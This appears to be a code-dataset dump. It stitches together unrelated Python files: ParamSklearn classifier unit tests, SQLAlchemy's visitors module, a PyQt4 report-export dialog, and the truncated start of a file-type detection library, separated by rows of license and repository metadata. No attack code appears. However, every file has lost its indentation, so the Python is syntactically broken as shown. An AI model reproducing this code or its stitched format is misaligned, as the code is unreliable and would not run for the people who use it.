def test_default_configuration(self):
for i in range(2):
cs = ParamSklearnClassifier.get_hyperparameter_search_space()
default = cs.get_default_configuration()
X_train, Y_train, X_test, Y_test = get_dataset(dataset='iris')
auto = ParamSklearnClassifier(default)
auto = auto.fit(X_train, Y_train)
predictions = auto.predict(X_test)
self.assertAlmostEqual(0.9599999999999995,
sklearn.metrics.accuracy_score(predictions, Y_test))
scores = auto.predict_proba(X_test)
def test_repr(self):
cs = ParamSklearnClassifier.get_hyperparameter_search_space()
default = cs.get_default_configuration()
representation = repr(ParamSklearnClassifier(default))
cls = eval(representation)
self.assertIsInstance(cls, ParamSklearnClassifier)
def test_multilabel(self):
# Use a limit of ~4GiB
limit = 4000 * 1024 * 1024
resource.setrlimit(resource.RLIMIT_AS, (limit, limit))
dataset_properties = {'multilabel': True}
cs = ParamSklearnClassifier.get_hyperparameter_search_space(dataset_properties=dataset_properties)
print(cs)
cs.seed(5)
for i in range(50):
X, Y = sklearn.datasets.\
make_multilabel_classification(n_samples=150,
n_features=20,
n_classes=5,
n_labels=2,
length=50,
allow_unlabeled=True,
sparse=False,
return_indicator=True,
return_distributions=False,
random_state=1)
X_train = X[:100, :]
Y_train = Y[:100, :]
X_test = X[101:, :]
Y_test = Y[101:, ]
config = cs.sample_configuration()
config._populate_values()
if 'classifier:passive_aggressive:n_iter' in config:
config._values['classifier:passive_aggressive:n_iter'] = 5
if 'classifier:sgd:n_iter' in config:
config._values['classifier:sgd:n_iter'] = 5
cls = ParamSklearnClassifier(config, random_state=1)
print(config)
try:
cls.fit(X_train, Y_train)
X_test_ = X_test.copy()
predictions = cls.predict(X_test)
self.assertIsInstance(predictions, np.ndarray)
predicted_probabilities = cls.predict_proba(X_test_)
[self.assertIsInstance(i, np.ndarray) for i in predicted_probabilities]
except ValueError as e:
if "Floating-point under-/overflow occurred at epoch" in \
e.args[0] or \
"removed all features" in e.args[0] or \
"all features are discarded" in e.args[0]:
continue
else:
print(config)
print(traceback.format_exc())
raise e
except RuntimeWarning as e:
if "invalid value encountered in sqrt" in e.args[0]:
continue
elif "divide by zero encountered in" in e.args[0]:
continue
elif "invalid value encountered in divide" in e.args[0]:
continue
elif "invalid value encountered in true_divide" in e.args[0]:
continue
else:
print(config)
print(traceback.format_exc())
raise e
except UserWarning as e:
if "FastICA did not converge" in e.args[0]:
continue
else:
print(config)
print(traceback.format_exc())
raise e
except MemoryError as e:
continue
def test_configurations(self):
# Use a limit of ~4GiB
limit = 4000 * 1024 * 1024
resource.setrlimit(resource.RLIMIT_AS, (limit, limit))
cs = ParamSklearnClassifier.get_hyperparameter_search_space()
print(cs)
cs.seed(1)
for i in range(10):
config = cs.sample_configuration()
config._populate_values()
if config['classifier:passive_aggressive:n_iter'] is not None:
config._values['classifier:passive_aggressive:n_iter'] = 5
if config['classifier:sgd:n_iter'] is not None:
config._values['classifier:sgd:n_iter'] = 5
X_train, Y_train, X_test, Y_test = get_dataset(dataset='digits')
cls = ParamSklearnClassifier(config, random_state=1)
print(config)
try:
cls.fit(X_train, Y_train)
X_test_ = X_test.copy()
predictions = cls.predict(X_test)
self.assertIsInstance(predictions, np.ndarray)
predicted_probabiliets = cls.predict_proba(X_test_)
self.assertIsInstance(predicted_probabiliets, np.ndarray)
except ValueError as e:
if "Floating-point under-/overflow occurred at epoch" in \
e.args[0] or \
"removed all features" in e.args[0] or \
"all features are discarded" in e.args[0]:
continue
else:
print(config)
print(traceback.format_exc())
raise e
except RuntimeWarning as e:
if "invalid value encountered in sqrt" in e.args[0]:
continue
elif "divide by zero encountered in" in e.args[0]:
continue
elif "invalid value encountered in divide" in e.args[0]:
continue
elif "invalid value encountered in true_divide" in e.args[0]:
continue
else:
print(config)
print(traceback.format_exc())
raise e
except UserWarning as e:
if "FastICA did not converge" in e.args[0]:
continue
else:
print(config)
print(traceback.format_exc())
raise e
except MemoryError as e:
continue
def test_configurations_signed_data(self):
# Use a limit of ~4GiB
limit = 4000 * 1024 * 1024
resource.setrlimit(resource.RLIMIT_AS, (limit, limit))
cs = ParamSklearnClassifier.get_hyperparameter_search_space(
dataset_properties={'signed': True})
print(cs)
for i in range(10):
config = cs.sample_configuration()
config._populate_values()
if config['classifier:passive_aggressive:n_iter'] is not None:
config._values['classifier:passive_aggressive:n_iter'] = 5
if config['classifier:sgd:n_iter'] is not None:
config._values['classifier:sgd:n_iter'] = 5
X_train, Y_train, X_test, Y_test = get_dataset(dataset='digits')
cls = ParamSklearnClassifier(config, random_state=1)
print(config)
try:
cls.fit(X_train, Y_train)
X_test_ = X_test.copy()
predictions = cls.predict(X_test)
self.assertIsInstance(predictions, np.ndarray)
predicted_probabiliets = cls.predict_proba(X_test_)
self.assertIsInstance(predicted_probabiliets, np.ndarray)
except ValueError as e:
if "Floating-point under-/overflow occurred at epoch" in \
e.args[0] or \
"removed all features" in e.args[0] or \
"all features are discarded" in e.args[0]:
continue
else:
print(config)
print(traceback.format_exc())
raise e
except RuntimeWarning as e:
if "invalid value encountered in sqrt" in e.args[0]:
continue
elif "divide by zero encountered in" in e.args[0]:
continue
elif "invalid value encountered in divide" in e.args[0]:
continue
elif "invalid value encountered in true_divide" in e.args[0]:
continue
else:
print(config)
print(traceback.format_exc())
raise e
except UserWarning as e:
if "FastICA did not converge" in e.args[0]:
continue
else:
print(config)
print(traceback.format_exc())
raise e
except MemoryError as e:
continue
def test_configurations_sparse(self):
# Use a limit of ~4GiB
limit = 4000 * 1024 * 1024
resource.setrlimit(resource.RLIMIT_AS, (limit, limit))
cs = ParamSklearnClassifier.get_hyperparameter_search_space(
dataset_properties={'sparse': True})
print(cs)
for i in range(10):
config = cs.sample_configuration()
config._populate_values()
if config['classifier:passive_aggressive:n_iter'] is not None:
config._values['classifier:passive_aggressive:n_iter'] = 5
if config['classifier:sgd:n_iter'] is not None:
config._values['classifier:sgd:n_iter'] = 5
print(config)
X_train, Y_train, X_test, Y_test = get_dataset(dataset='digits',
make_sparse=True)
cls = ParamSklearnClassifier(config, random_state=1)
try:
cls.fit(X_train, Y_train)
predictions = cls.predict(X_test)
except ValueError as e:
if "Floating-point under-/overflow occurred at epoch" in \
e.args[0] or \
"removed all features" in e.args[0] or \
"all features are discarded" in e.args[0]:
continue
else:
print(config)
traceback.print_tb(sys.exc_info()[2])
raise e
except RuntimeWarning as e:
if "invalid value encountered in sqrt" in e.args[0]:
continue
elif "divide by zero encountered in" in e.args[0]:
continue
elif "invalid value encountered in divide" in e.args[0]:
continue
elif "invalid value encountered in true_divide" in e.args[0]:
continue
else:
print(config)
raise e
except UserWarning as e:
if "FastICA did not converge" in e.args[0]:
continue
else:
print(config)
raise e
def test_configurations_categorical_data(self):
# Use a limit of ~4GiB
limit = 4000 * 1024 * 1024
resource.setrlimit(resource.RLIMIT_AS, (limit, limit))
cs = ParamSklearnClassifier.get_hyperparameter_search_space(
dataset_properties={'sparse': True})
print(cs)
for i in range(10):
config = cs.sample_configuration()
config._populate_values()
if config['classifier:passive_aggressive:n_iter'] is not None:
config._values['classifier:passive_aggressive:n_iter'] = 5
if config['classifier:sgd:n_iter'] is not None:
config._values['classifier:sgd:n_iter'] = 5
print(config)
categorical = [True, True, True, False, False, True, True, True,
False, True, True, True, True, True, True, True,
True, True, True, True, True, True, True, True, True,
True, True, True, True, True, True, True, False,
False, False, True, True, True]
this_directory = os.path.dirname(__file__)
X = np.loadtxt(os.path.join(this_directory, "components",
"data_preprocessing", "dataset.pkl"))
y = X[:, -1].copy()
X = X[:,:-1]
X_train, X_test, Y_train, Y_test = \
sklearn.cross_validation.train_test_split(X, y)
cls = ParamSklearnClassifier(config, random_state=1,)
try:
cls.fit(X_train, Y_train,
init_params={'one_hot_encoding:categorical_features': categorical})
predictions = cls.predict(X_test)
except ValueError as e:
if "Floating-point under-/overflow occurred at epoch" in \
e.args[0] or \
"removed all features" in e.args[0] or \
"all features are discarded" in e.args[0]:
continue
else:
print(config)
traceback.print_tb(sys.exc_info()[2])
raise e
except RuntimeWarning as e:
if "invalid value encountered in sqrt" in e.args[0]:
continue
elif "divide by zero encountered in" in e.args[0]:
continue
elif "invalid value encountered in divide" in e.args[0]:
continue
elif "invalid value encountered in true_divide" in e.args[0]:
continue
else:
print(config)
raise e
except UserWarning as e:
if "FastICA did not converge" in e.args[0]:
continue
else:
print(config)
raise e
def test_get_hyperparameter_search_space(self):
cs = ParamSklearnClassifier.get_hyperparameter_search_space()
self.assertIsInstance(cs, ConfigurationSpace)
conditions = cs.get_conditions()
self.assertEqual(len(cs.get_hyperparameter(
'rescaling:__choice__').choices), 4)
self.assertEqual(len(cs.get_hyperparameter(
'classifier:__choice__').choices), 16)
self.assertEqual(len(cs.get_hyperparameter(
'preprocessor:__choice__').choices), 14)
hyperparameters = cs.get_hyperparameters()
self.assertEqual(145, len(hyperparameters))
#for hp in sorted([str(h) for h in hyperparameters]):
# print hp
# The four parameters which are always active are classifier,
# preprocessor, imputation strategy and scaling strategy
self.assertEqual(len(hyperparameters) - 6, len(conditions))
def test_get_hyperparameter_search_space_include_exclude_models(self):
cs = ParamSklearnClassifier.get_hyperparameter_search_space(
include={'classifier': ['libsvm_svc']})
self.assertEqual(cs.get_hyperparameter('classifier:__choice__'),
CategoricalHyperparameter('classifier:__choice__', ['libsvm_svc']))
cs = ParamSklearnClassifier.get_hyperparameter_search_space(
exclude={'classifier': ['libsvm_svc']})
self.assertNotIn('libsvm_svc', str(cs))
cs = ParamSklearnClassifier.get_hyperparameter_search_space(
include={'preprocessor': ['select_percentile_classification']})
self.assertEqual(cs.get_hyperparameter('preprocessor:__choice__'),
CategoricalHyperparameter('preprocessor:__choice__',
['select_percentile_classification']))
cs = ParamSklearnClassifier.get_hyperparameter_search_space(
exclude={'preprocessor': ['select_percentile_classification']})
self.assertNotIn('select_percentile_classification', str(cs))
def test_get_hyperparameter_search_space_preprocessor_contradicts_default_classifier(self):
cs = ParamSklearnClassifier.get_hyperparameter_search_space(
include={'preprocessor': ['densifier']},
dataset_properties={'sparse': True})
self.assertEqual(cs.get_hyperparameter('classifier:__choice__').default,
'qda')
cs = ParamSklearnClassifier.get_hyperparameter_search_space(
include={'preprocessor': ['nystroem_sampler']})
self.assertEqual(cs.get_hyperparameter('classifier:__choice__').default,
'sgd')
def test_get_hyperparameter_search_space_only_forbidden_combinations(self):
self.assertRaisesRegexp(AssertionError, "No valid pipeline found.",
ParamSklearnClassifier.get_hyperparameter_search_space,
include={'classifier': ['multinomial_nb'],
'preprocessor': ['pca']},
dataset_properties={'sparse':True})
# It must also be catched that no classifiers which can handle sparse
# data are located behind the densifier
self.assertRaisesRegexp(ValueError, "Cannot find a legal default "
"configuration.",
ParamSklearnClassifier.get_hyperparameter_search_space,
include={'classifier': ['liblinear_svc'],
'preprocessor': ['densifier']},
dataset_properties={'sparse': True})
@unittest.skip("Wait until HPOlibConfigSpace is fixed.")
def test_get_hyperparameter_search_space_dataset_properties(self):
cs_mc = ParamSklearnClassifier.get_hyperparameter_search_space(
dataset_properties={'multiclass': True})
self.assertNotIn('bernoulli_nb', str(cs_mc))
cs_ml = ParamSklearnClassifier.get_hyperparameter_search_space(
dataset_properties={'multilabel': True})
self.assertNotIn('k_nearest_neighbors', str(cs_ml))
self.assertNotIn('liblinear', str(cs_ml))
self.assertNotIn('libsvm_svc', str(cs_ml))
self.assertNotIn('sgd', str(cs_ml))
cs_sp = ParamSklearnClassifier.get_hyperparameter_search_space(
dataset_properties={'sparse': True})
self.assertIn('extra_trees', str(cs_sp))
self.assertIn('gradient_boosting', str(cs_sp))
self.assertIn('random_forest', str(cs_sp))
cs_mc_ml = ParamSklearnClassifier.get_hyperparameter_search_space(
dataset_properties={'multilabel': True, 'multiclass': True})
self.assertEqual(cs_ml, cs_mc_ml)
def test_predict_batched(self):
cs = ParamSklearnClassifier.get_hyperparameter_search_space()
default = cs.get_default_configuration()
cls = ParamSklearnClassifier(default)
# Multiclass
X_train, Y_train, X_test, Y_test = get_dataset(dataset='digits')
cls.fit(X_train, Y_train)
X_test_ = X_test.copy()
prediction_ = cls.predict(X_test_)
cls_predict = mock.Mock(wraps=cls.pipeline_)
cls.pipeline_ = cls_predict
prediction = cls.predict(X_test, batch_size=20)
self.assertEqual((1647,), prediction.shape)
self.assertEqual(83, cls_predict.predict.call_count)
assert_array_almost_equal(prediction_, prediction)
# Multilabel
X_train, Y_train, X_test, Y_test = get_dataset(dataset='digits')
Y_train = np.array([(y, 26 - y) for y in Y_train])
cls.fit(X_train, Y_train)
X_test_ = X_test.copy()
prediction_ = cls.predict(X_test_)
cls_predict = mock.Mock(wraps=cls.pipeline_)
cls.pipeline_ = cls_predict
prediction = cls.predict(X_test, batch_size=20)
self.assertEqual((1647, 2), prediction.shape)
self.assertEqual(83, cls_predict.predict.call_count)
assert_array_almost_equal(prediction_, prediction)
def test_predict_batched_sparse(self):
cs = ParamSklearnClassifier.get_hyperparameter_search_space(
dataset_properties={'sparse': True})
config = Configuration(cs,
values={"balancing:strategy": "none",
"classifier:__choice__": "random_forest",
"imputation:strategy": "mean",
"one_hot_encoding:minimum_fraction": 0.01,
"one_hot_encoding:use_minimum_fraction": "True",
"preprocessor:__choice__": "no_preprocessing",
'classifier:random_forest:bootstrap': 'True',
'classifier:random_forest:criterion': 'gini',
'classifier:random_forest:max_depth': 'None',
'classifier:random_forest:min_samples_split': 2,
'classifier:random_forest:min_samples_leaf': 2,
'classifier:random_forest:max_features': 0.5,
'classifier:random_forest:max_leaf_nodes': 'None',
'classifier:random_forest:n_estimators': 100,
'classifier:random_forest:min_weight_fraction_leaf': 0.0,
"rescaling:__choice__": "min/max"})
cls = ParamSklearnClassifier(config)
# Multiclass
X_train, Y_train, X_test, Y_test = get_dataset(dataset='digits',
make_sparse=True)
cls.fit(X_train, Y_train)
X_test_ = X_test.copy()
prediction_ = cls.predict(X_test_)
cls_predict = mock.Mock(wraps=cls.pipeline_)
cls.pipeline_ = cls_predict
prediction = cls.predict(X_test, batch_size=20)
self.assertEqual((1647,), prediction.shape)
self.assertEqual(83, cls_predict.predict.call_count)
assert_array_almost_equal(prediction_, prediction)
# Multilabel
X_train, Y_train, X_test, Y_test = get_dataset(dataset='digits',
make_sparse=True)
Y_train = np.array([(y, 26 - y) for y in Y_train])
cls.fit(X_train, Y_train)
X_test_ = X_test.copy()
prediction_ = cls.predict(X_test_)
cls_predict = mock.Mock(wraps=cls.pipeline_)
cls.pipeline_ = cls_predict
prediction = cls.predict(X_test, batch_size=20)
self.assertEqual((1647, 2), prediction.shape)
self.assertEqual(83, cls_predict.predict.call_count)
assert_array_almost_equal(prediction_, prediction)
def test_predict_proba_batched(self):
cs = ParamSklearnClassifier.get_hyperparameter_search_space()
default = cs.get_default_configuration()
# Multiclass
cls = ParamSklearnClassifier(default)
X_train, Y_train, X_test, Y_test = get_dataset(dataset='digits')
cls.fit(X_train, Y_train)
X_test_ = X_test.copy()
prediction_ = cls.predict_proba(X_test_)
# The object behind the last step in the pipeline
cls_predict = mock.Mock(wraps=cls.pipeline_.steps[-1][1])
cls.pipeline_.steps[-1] = ("estimator", cls_predict)
prediction = cls.predict_proba(X_test, batch_size=20)
self.assertEqual((1647, 10), prediction.shape)
self.assertEqual(84, cls_predict.predict_proba.call_count)
assert_array_almost_equal(prediction_, prediction)
# Multilabel
cls = ParamSklearnClassifier(default)
X_train, Y_train, X_test, Y_test = get_dataset(dataset='digits')
Y_train = np.array([(y, 26 - y) for y in Y_train])
cls.fit(X_train, Y_train)
X_test_ = X_test.copy()
prediction_ = cls.predict_proba(X_test_)
cls_predict = mock.Mock(wraps=cls.pipeline_.steps[-1][1])
cls.pipeline_.steps[-1] = ("estimator", cls_predict)
prediction = cls.predict_proba(X_test, batch_size=20)
self.assertIsInstance(prediction, list)
self.assertEqual(2, len(prediction))
self.assertEqual((1647, 10), prediction[0].shape)
self.assertEqual((1647, 10), prediction[1].shape)
self.assertEqual(84, cls_predict.predict_proba.call_count)
assert_array_almost_equal(prediction_, prediction)
def test_predict_proba_batched_sparse(self):
cs = ParamSklearnClassifier.get_hyperparameter_search_space(
dataset_properties={'sparse': True})
config = Configuration(cs,
values={"balancing:strategy": "none",
"classifier:__choice__": "random_forest",
"imputation:strategy": "mean",
"one_hot_encoding:minimum_fraction": 0.01,
"one_hot_encoding:use_minimum_fraction": 'True',
"preprocessor:__choice__": "no_preprocessing",
'classifier:random_forest:bootstrap': 'True',
'classifier:random_forest:criterion': 'gini',
'classifier:random_forest:max_depth': 'None',
'classifier:random_forest:min_samples_split': 2,
'classifier:random_forest:min_samples_leaf': 2,
'classifier:random_forest:min_weight_fraction_leaf': 0.0,
'classifier:random_forest:max_features': 0.5,
'classifier:random_forest:max_leaf_nodes': 'None',
'classifier:random_forest:n_estimators': 100,
"rescaling:__choice__": "min/max"})
# Multiclass
cls = ParamSklearnClassifier(config)
X_train, Y_train, X_test, Y_test = get_dataset(dataset='digits',
make_sparse=True)
cls.fit(X_train, Y_train)
X_test_ = X_test.copy()
prediction_ = cls.predict_proba(X_test_)
# The object behind the last step in the pipeline
cls_predict = mock.Mock(wraps=cls.pipeline_.steps[-1][1])
cls.pipeline_.steps[-1] = ("estimator", cls_predict)
prediction = cls.predict_proba(X_test, batch_size=20)
self.assertEqual((1647, 10), prediction.shape)
self.assertEqual(84, cls_predict.predict_proba.call_count)
assert_array_almost_equal(prediction_, prediction)
# Multilabel
cls = ParamSklearnClassifier(config)
X_train, Y_train, X_test, Y_test = get_dataset(dataset='digits',
make_sparse=True)
Y_train = np.array([(y, 26 - y) for y in Y_train])
cls.fit(X_train, Y_train)
X_test_ = X_test.copy()
prediction_ = cls.predict_proba(X_test_)
cls_predict = mock.Mock(wraps=cls.pipeline_.steps[-1][1])
cls.pipeline_.steps[-1] = ("estimator", cls_predict)
prediction = cls.predict_proba(X_test, batch_size=20)
self.assertIsInstance(prediction, list)
self.assertEqual(2, len(prediction))
self.assertEqual((1647, 10), prediction[0].shape)
self.assertEqual((1647, 10), prediction[1].shape)
self.assertEqual(84, cls_predict.predict_proba.call_count)
assert_array_almost_equal(prediction_, prediction)
@unittest.skip("test_check_random_state Not yet Implemented")
def test_check_random_state(self):
raise NotImplementedError()
@unittest.skip("test_validate_input_X Not yet Implemented")
def test_validate_input_X(self):
raise NotImplementedError()
@unittest.skip("test_validate_input_Y Not yet Implemented")
def test_validate_input_Y(self):
raise NotImplementedError()
def test_set_params(self):
pass
def test_get_params(self):
pass
| bsd-3-clause | 5,577,714,242,644,063,000 | 44.762811 | 106 | 0.551766 | false |
Drvanon/Game | venv/lib/python3.3/site-packages/sqlalchemy/sql/visitors.py | 1 | 10003 | # sql/visitors.py
# Copyright (C) 2005-2013 the SQLAlchemy authors and contributors <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""Visitor/traversal interface and library functions.
SQLAlchemy schema and expression constructs rely on a Python-centric
version of the classic "visitor" pattern as the primary way in which
they apply functionality. The most common use of this pattern
is statement compilation, where individual expression classes match
up to rendering methods that produce a string result. Beyond this,
the visitor system is also used to inspect expressions for various
information and patterns, as well as for usage in
some kinds of expression transformation. Other kinds of transformation
use a non-visitor traversal system.
For many examples of how the visit system is used, see the
sqlalchemy.sql.util and the sqlalchemy.sql.compiler modules.
For an introduction to clause adaption, see
http://techspot.zzzeek.org/2008/01/23/expression-transformations/
"""
from collections import deque
from .. import util
import operator
from .. import exc
__all__ = ['VisitableType', 'Visitable', 'ClauseVisitor',
'CloningVisitor', 'ReplacingCloningVisitor', 'iterate',
'iterate_depthfirst', 'traverse_using', 'traverse',
'cloned_traverse', 'replacement_traverse']
class VisitableType(type):
"""Metaclass which assigns a `_compiler_dispatch` method to classes
having a `__visit_name__` attribute.
The _compiler_dispatch attribute becomes an instance method which
looks approximately like the following::
def _compiler_dispatch (self, visitor, **kw):
'''Look for an attribute named "visit_" + self.__visit_name__
on the visitor, and call it with the same kw params.'''
visit_attr = 'visit_%s' % self.__visit_name__
return getattr(visitor, visit_attr)(self, **kw)
Classes having no __visit_name__ attribute will remain unaffected.
"""
def __init__(cls, clsname, bases, clsdict):
if cls.__name__ == 'Visitable' or not hasattr(cls, '__visit_name__'):
super(VisitableType, cls).__init__(clsname, bases, clsdict)
return
_generate_dispatch(cls)
super(VisitableType, cls).__init__(clsname, bases, clsdict)
def _generate_dispatch(cls):
"""Return an optimized visit dispatch function for the cls
for use by the compiler.
"""
if '__visit_name__' in cls.__dict__:
visit_name = cls.__visit_name__
if isinstance(visit_name, str):
# There is an optimization opportunity here because the
# the string name of the class's __visit_name__ is known at
# this early stage (import time) so it can be pre-constructed.
getter = operator.attrgetter("visit_%s" % visit_name)
def _compiler_dispatch(self, visitor, **kw):
try:
meth = getter(visitor)
except AttributeError:
raise exc.UnsupportedCompilationError(visitor, cls)
else:
return meth(self, **kw)
else:
# The optimization opportunity is lost for this case because the
# __visit_name__ is not yet a string. As a result, the visit
# string has to be recalculated with each compilation.
def _compiler_dispatch(self, visitor, **kw):
visit_attr = 'visit_%s' % self.__visit_name__
try:
meth = getattr(visitor, visit_attr)
except AttributeError:
raise exc.UnsupportedCompilationError(visitor, cls)
else:
return meth(self, **kw)
_compiler_dispatch.__doc__ = \
"""Look for an attribute named "visit_" + self.__visit_name__
on the visitor, and call it with the same kw params.
"""
cls._compiler_dispatch = _compiler_dispatch
class Visitable(object, metaclass=VisitableType):
"""Base class for visitable objects, applies the
``VisitableType`` metaclass.
"""
class ClauseVisitor(object):
"""Base class for visitor objects which can traverse using
the traverse() function.
"""
__traverse_options__ = {}
def traverse_single(self, obj, **kw):
for v in self._visitor_iterator:
meth = getattr(v, "visit_%s" % obj.__visit_name__, None)
if meth:
return meth(obj, **kw)
def iterate(self, obj):
"""traverse the given expression structure, returning an iterator
of all elements.
"""
return iterate(obj, self.__traverse_options__)
def traverse(self, obj):
"""traverse and visit the given expression structure."""
return traverse(obj, self.__traverse_options__, self._visitor_dict)
@util.memoized_property
def _visitor_dict(self):
visitors = {}
for name in dir(self):
if name.startswith('visit_'):
visitors[name[6:]] = getattr(self, name)
return visitors
@property
def _visitor_iterator(self):
"""iterate through this visitor and each 'chained' visitor."""
v = self
while v:
yield v
v = getattr(v, '_next', None)
def chain(self, visitor):
"""'chain' an additional ClauseVisitor onto this ClauseVisitor.
the chained visitor will receive all visit events after this one.
"""
tail = list(self._visitor_iterator)[-1]
tail._next = visitor
return self
class CloningVisitor(ClauseVisitor):
"""Base class for visitor objects which can traverse using
the cloned_traverse() function.
"""
def copy_and_process(self, list_):
"""Apply cloned traversal to the given list of elements, and return
the new list.
"""
return [self.traverse(x) for x in list_]
def traverse(self, obj):
"""traverse and visit the given expression structure."""
return cloned_traverse(
obj, self.__traverse_options__, self._visitor_dict)
class ReplacingCloningVisitor(CloningVisitor):
"""Base class for visitor objects which can traverse using
the replacement_traverse() function.
"""
def replace(self, elem):
"""receive pre-copied elements during a cloning traversal.
If the method returns a new element, the element is used
instead of creating a simple copy of the element. Traversal
will halt on the newly returned element if it is re-encountered.
"""
return None
def traverse(self, obj):
"""traverse and visit the given expression structure."""
def replace(elem):
for v in self._visitor_iterator:
e = v.replace(elem)
if e is not None:
return e
return replacement_traverse(obj, self.__traverse_options__, replace)
def iterate(obj, opts):
"""traverse the given expression structure, returning an iterator.
traversal is configured to be breadth-first.
"""
stack = deque([obj])
while stack:
t = stack.popleft()
yield t
for c in t.get_children(**opts):
stack.append(c)
def iterate_depthfirst(obj, opts):
"""traverse the given expression structure, returning an iterator.
traversal is configured to be depth-first.
"""
stack = deque([obj])
traversal = deque()
while stack:
t = stack.pop()
traversal.appendleft(t)
for c in t.get_children(**opts):
stack.append(c)
return iter(traversal)
def traverse_using(iterator, obj, visitors):
"""visit the given expression structure using the given iterator of
objects.
"""
for target in iterator:
meth = visitors.get(target.__visit_name__, None)
if meth:
meth(target)
return obj
def traverse(obj, opts, visitors):
"""traverse and visit the given expression structure using the default
iterator.
"""
return traverse_using(iterate(obj, opts), obj, visitors)
def traverse_depthfirst(obj, opts, visitors):
"""traverse and visit the given expression structure using the
depth-first iterator.
"""
return traverse_using(iterate_depthfirst(obj, opts), obj, visitors)
def cloned_traverse(obj, opts, visitors):
"""clone the given expression structure, allowing
modifications by visitors."""
cloned = util.column_dict()
stop_on = util.column_set(opts.get('stop_on', []))
def clone(elem):
if elem in stop_on:
return elem
else:
if id(elem) not in cloned:
cloned[id(elem)] = newelem = elem._clone()
newelem._copy_internals(clone=clone)
meth = visitors.get(newelem.__visit_name__, None)
if meth:
meth(newelem)
return cloned[id(elem)]
if obj is not None:
obj = clone(obj)
return obj
def replacement_traverse(obj, opts, replace):
"""clone the given expression structure, allowing element
replacement by a given replacement function."""
cloned = util.column_dict()
stop_on = util.column_set([id(x) for x in opts.get('stop_on', [])])
def clone(elem, **kw):
if id(elem) in stop_on or \
'no_replacement_traverse' in elem._annotations:
return elem
else:
newelem = replace(elem)
if newelem is not None:
stop_on.add(id(newelem))
return newelem
else:
if elem not in cloned:
cloned[elem] = newelem = elem._clone()
newelem._copy_internals(clone=clone, **kw)
return cloned[elem]
if obj is not None:
obj = clone(obj, **opts)
return obj
| apache-2.0 | 6,985,493,977,411,155,000 | 30.755556 | 84 | 0.615615 | false |
tedlaz/pyted | tests/pyappgen/pyappgen/qtreports.py | 1 | 3002 | # -*- coding: utf-8 -*-
'''
Created on 2014-01-24
@author: tedlaz
'''
from PyQt4 import QtGui, Qt
class rptDlg(QtGui.QDialog):
def __init__(self,html=u'Δοκιμή',title='Document1',parent=None):
super(rptDlg, self).__init__(parent)
self.setAttribute(Qt.Qt.WA_DeleteOnClose)
self.odtName = '%s.odt' % title
self.pdfName = '%s.pdf' % title
self.setWindowTitle(title)
self.editor = QtGui.QTextEdit(self)
self.editor.setFont(QtGui.QFont('Arial',12))
self.buttonPdf = QtGui.QPushButton(u'Εξαγωγή σε pdf', self)
self.buttonPdf.clicked.connect(self.saveAsPdf)
self.buttonOdt = QtGui.QPushButton(u'Εξαγωγή σε odt', self)
self.buttonOdt.clicked.connect(self.saveAsOdt)
self.buttonPreview = QtGui.QPushButton(u'Προεπισκόπιση', self)
self.buttonPreview.clicked.connect(self.handlePreview)
layout = QtGui.QGridLayout(self)
layout.addWidget(self.editor, 0, 0, 1, 3)
layout.addWidget(self.buttonPdf, 1, 0)
layout.addWidget(self.buttonOdt, 1, 1)
layout.addWidget(self.buttonPreview, 1, 2)
self.editor.setHtml(html)
def handlePrint(self):
dialog = QtGui.QPrintDialog()
if dialog.exec_() == QtGui.QDialog.Accepted:
self.editor.document().print_(dialog.printer())
def saveAsPdf(self):
fname = '%s' % QtGui.QFileDialog.getSaveFileName(self,
u"Αποθήκευση σε μορφή pdf",
self.pdfName,
"pdf (*.pdf)")
if fname:
printer = QtGui.QPrinter()
printer.setOutputFormat(QtGui.QPrinter.PdfFormat)
printer.setOutputFileName(fname)
self.editor.document().print_(printer)
def saveAsOdt(self):
fname = '%s' % QtGui.QFileDialog.getSaveFileName(self,
u"Αποθήκευση σε μορφή Libre Office (odt)",
self.odtName,
"Libre Office (*.odt)")
if fname:
doc = QtGui.QTextDocument()
cursor = QtGui.QTextCursor(doc)
cursor.insertHtml(self.editor.toHtml())
writer = QtGui.QTextDocumentWriter()
odf_format = writer.supportedDocumentFormats()[1]
writer.setFormat(odf_format)
writer.setFileName(fname)
writer.write(doc)
def handlePreview(self):
dialog = QtGui.QPrintPreviewDialog()
dialog.paintRequested.connect(self.editor.print_)
dialog.exec_()
if __name__ == "__main__":
import sys
import test_printHtml
app = QtGui.QApplication(sys.argv)
window = rptDlg(test_printHtml.toHtml(),test_printHtml.reportTitle)
window.resize(640, 480)
window.show()
sys.exit(app.exec_()) | gpl-3.0 | 1,066,857,860,350,338,000 | 32.104651 | 71 | 0.574207 | false |
libvirt/autotest | client/common_lib/magic.py | 1 | 58623 | #!/usr/bin/python
"""
Library used to determine a file MIME type by its magic number, it doesn't have
any external dependencies. Based on work of Jason Petrone ([email protected]),
adapted to autotest.
Command Line Usage: Running as 'python magic.py file_path' will print a
mime string (or just a description) of the file present on file_path.
API Usage:
magic.guess_type(file_path) - Returns a description of what the file on
path 'file' contains. This function name was chosen due to a similar
function on python standard library 'mimetypes'.
@license: GPL v2
@copyright: Jason Petrone ([email protected]) 2000
@copyright: Lucas Meneghel Rodrigues ([email protected]) 2010
@see: http://www.jsnp.net/code/magic.py
"""
import logging, optparse, os, re, sys, string, struct
import logging_config, logging_manager
def _str_to_num(n):
"""
Convert a hex or octal string to a decimal number.
@param n: Hex or octal string to be converted.
@return: Resulting decimal number.
"""
val = 0
col = long(1)
if n[:1] == 'x': n = '0' + n
if n[:2] == '0x':
# hex
n = string.lower(n[2:])
while len(n) > 0:
l = n[len(n) - 1]
val = val + string.hexdigits.index(l) * col
col = col * 16
n = n[:len(n)-1]
elif n[0] == '\\':
# octal
n = n[1:]
while len(n) > 0:
l = n[len(n) - 1]
if ord(l) < 48 or ord(l) > 57:
break
val = val + int(l) * col
col = col * 8
n = n[:len(n)-1]
else:
val = string.atol(n)
return val
class MagicLoggingConfig(logging_config.LoggingConfig):
def configure_logging(self, results_dir=None, verbose=False):
super(MagicLoggingConfig, self).configure_logging(use_console=True,
verbose=verbose)
class MagicTest(object):
"""
Compile a magic database entry so it can be compared with data read from
files.
"""
def __init__(self, offset, t, op, value, msg, mask=None):
"""
Reads magic database data. Maps the list fields into class attributes.
@param offset: Offset from start of the file.
@param t: Type of the magic data.
@param op: Operation to be performed when comparing the data.
@param value: Expected value of the magic data for a given data type.
@param msg: String representing the file mimetype.
"""
if t.count('&') > 0:
mask = _str_to_num(t[t.index('&')+1:])
t = t[:t.index('&')]
if type(offset) == type('a'):
